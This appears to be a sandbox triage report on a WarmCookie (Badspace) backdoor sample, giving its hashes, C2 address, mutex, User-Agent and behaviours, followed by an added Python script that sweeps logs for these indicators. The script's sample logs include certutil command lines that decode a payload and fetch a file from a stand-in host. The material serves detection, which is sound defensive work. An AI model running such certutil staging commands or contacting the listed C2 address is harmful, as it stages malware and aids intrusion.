General

  • Target

    decoded-2.js

  • Size

    114KB

  • Sample

    250125-1jmj3ssper

  • MD5

    202ade5e6433d48697049f1962f1c87a

  • SHA1

    cfead5849611f5e42092453afb7d3aa22174b223

  • SHA256

    74a7adba42d14c4325d64bb93857d44e269a096815df71f24e5a38bd5351842d

  • SHA512

    fa7ec940c62ede3bc1627a2f03922090ad114967efd15a7feea998b5abfa0ae9b48630d2376caaabe632a8aa1c7996d81dbcee0b9f9d30c6270f117650648685

  • SSDEEP

    1536:UKucuwu/P9vckrgF4zjnAsR6KZs7/wpY0tOCMBh0ljjqcFs:UKFuf/P9UkG4zjCKo/eKBhYs

Malware Config

Extracted

Family

warmcookie

C2

149.248.58.85

Attributes

  • mutex

    3e4d7a5b-aa72-4d5f-8f8c-b292257af55c

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Targets

    • Target

      decoded-2.js

    • Warmcookie family

    • Warmcookie, Badspace

      Warmcookie, also known as Badspace, is a backdoor written in C++.

    • Blocklisted process makes network request

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Deobfuscate/Decode Files or Information

      Payload decoded via CertUtil.

    • Drops file in System32 directory
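A triage script that turns the extracted configuration and the CertUtil signature above into something you can run over your own telemetry. This is an added example, not code from the tria.ge report or from the sample: it sweeps proxy lines for the extracted C2 address and the exact User-Agent, sweeps process-creation events for certutil invoked with decode/staging switches (the behaviour behind "Payload decoded via CertUtil") and notes when a script host spawned it, and compares a list of observed named objects against the extracted mutex. The three indicator constants are copied from the report; every log line, path, client address and mutex name other than the report's is constructed for the example.

```python
"""Added example, not code from the tria.ge report or from the sample: sweep
constructed proxy and process-creation logs for the indicators the report
extracts from decoded-2.js (WarmCookie C2 IP, mutex, User-Agent) and for the
certutil decode/staging switches behind "Payload decoded via CertUtil".
Only the three indicator constants are real; every log line is constructed."""
import re
from typing import Iterable

# Indicators copied from the report's "Malware Config" section.
C2_IP = "149.248.58.85"
USER_AGENT = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) "
              "Gecko/20100101 Firefox/115.0")
MUTEX = "3e4d7a5b-aa72-4d5f-8f8c-b292257af55c"

# Constructed proxy log, tab-separated: time, client, dst_ip, url, status, user_agent.
PROXY_LOG = """\
2025-01-25T10:01:02Z\t10.0.0.23\t198.51.100.7\thttps://intranet.example/\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0
2025-01-25T10:01:15Z\t10.0.0.23\t149.248.58.85\thttp://149.248.58.85/\t200\tMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
2025-01-25T10:02:40Z\t10.0.0.41\t203.0.113.9\thttp://203.0.113.9/upd\t404\tMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
2025-01-25T10:03:01Z\t10.0.0.41\t198.51.100.7\thttps://intranet.example/\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
"""

# Constructed process-creation events, tab-separated: time, parent_image, image, command_line.
PROCESS_LOG = """\
2025-01-25T10:01:05Z\tC:\\Windows\\System32\\wscript.exe\tC:\\Windows\\System32\\certutil.exe\tcertutil -decode C:\\Users\\Public\\in.txt C:\\Users\\Public\\out.dll
2025-01-25T10:05:00Z\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\certutil.exe\tcertutil -store My
2025-01-25T10:06:00Z\tC:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\certutil.exe\tcertutil.exe /urlcache /f http://203.0.113.9/p.txt p.txt
"""

# Constructed list of named objects as a handle-enumeration tool might print them.
OBSERVED_MUTEXES = [
    "Local\\ExampleVendorUpdater",
    "Global\\3E4D7A5B-AA72-4D5F-8F8C-B292257AF55C",
    "Local\\AnotherSingleInstanceApp",
]

CERTUTIL_RE = re.compile(r'(?:^|[\\\s"])certutil(?:\.exe)?\b', re.IGNORECASE)
# certutil switches used for decoding or pulling payloads rather than managing certificates.
STAGING_SWITCHES = {"decode", "decodehex", "encode", "urlcache", "verifyctl"}
# Parents that indicate a script, not an administrator, launched certutil.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def certutil_staging_switches(command_line: str) -> list[str]:
    """Return the staging switches present in a certutil command line, or []."""
    if not CERTUTIL_RE.search(command_line):
        return []
    # certutil accepts both '-' and '/' as the switch prefix, case-insensitively.
    # Whitespace splitting is enough here: only the switches matter, not paths.
    return [tok[1:].lower() for tok in command_line.split()
            if tok[:1] in ("-", "/") and tok[1:].lower() in STAGING_SWITCHES]


def scan_proxy_log(log: str) -> list[dict]:
    """Flag lines that reach the extracted C2 or carry the exact extracted UA."""
    hits = []
    for line in filter(None, log.splitlines()):
        ts, client, dst_ip, _url, _status, ua = line.split("\t", 5)
        reasons = []
        if dst_ip == C2_IP:
            reasons.append("c2_ip")
        if ua == USER_AGENT:
            reasons.append("user_agent")
        if reasons:
            hits.append({"time": ts, "client": client, "dst_ip": dst_ip, "reasons": reasons})
    return hits


def scan_process_log(log: str) -> list[dict]:
    """Flag certutil runs with staging switches and note if a script host spawned them."""
    hits = []
    for line in filter(None, log.splitlines()):
        ts, parent, _image, cmdline = line.split("\t", 3)
        switches = certutil_staging_switches(cmdline)
        if switches:
            parent_name = parent.rsplit("\\", 1)[-1].lower()
            hits.append({"time": ts, "switches": switches, "parent": parent_name,
                         "script_host_parent": parent_name in SCRIPT_HOSTS})
    return hits


def match_mutexes(observed: Iterable[str]) -> list[str]:
    """Return observed object names equal to the extracted mutex, ignoring the
    Global/Local session prefix and the case a tool prints the GUID in."""
    return [m for m in observed if m.rsplit("\\", 1)[-1].lower() == MUTEX]


if __name__ == "__main__":
    for hit in scan_proxy_log(PROXY_LOG):
        print("proxy   ", hit)
    for hit in scan_process_log(PROCESS_LOG):
        print("process ", hit)
    for name in match_mutexes(OBSERVED_MUTEXES):
        print("mutex   ", name)
```

Two caveats when using the output. The User-Agent advertises Windows NT 6.1 (Windows 7) with Firefox 115, the last Firefox branch that runs on Windows 7 (115 ESR), so a genuine Windows 7 Firefox user produces the identical string; treat a user_agent-only hit as weak and corroborate it with the C2 address or the certutil and registry behaviour. The "Blocklisted process makes network request", "Loads dropped DLL" and "Drops file in System32 directory" findings are sandbox behaviours rather than strings, and the script above covers only what the config extractor and the CertUtil signature give you.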

MITRE ATT&CK Enterprise v15

Tasks